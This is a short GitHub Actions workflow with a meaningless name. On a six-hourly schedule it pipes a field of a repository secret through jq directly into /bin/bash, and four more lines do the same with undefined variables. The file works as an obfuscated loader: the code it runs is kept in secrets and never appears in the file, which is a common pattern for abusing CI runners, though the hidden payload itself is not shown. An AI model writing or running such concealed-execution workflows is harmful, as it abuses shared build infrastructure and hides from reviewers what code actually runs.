name: ghauiijnan

on:
  workflow_dispatch:
  schedule:
    - cron: '56 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: ghauiijnan
        env:
          i1054: ${{ secrets.i1054 }}
        run: |
          echo $i1054 | jq -r .udn89227 | /bin/bash
          echo $dkfl8 | jq -r .njlip65 | /bin/bash
          echo $oxz102 | jq -r .nk246 | /bin/bash
          echo $k8 | jq -r .evjf48318 | /bin/bash
          echo $t0879 | jq -r .im13 | /bin/bash

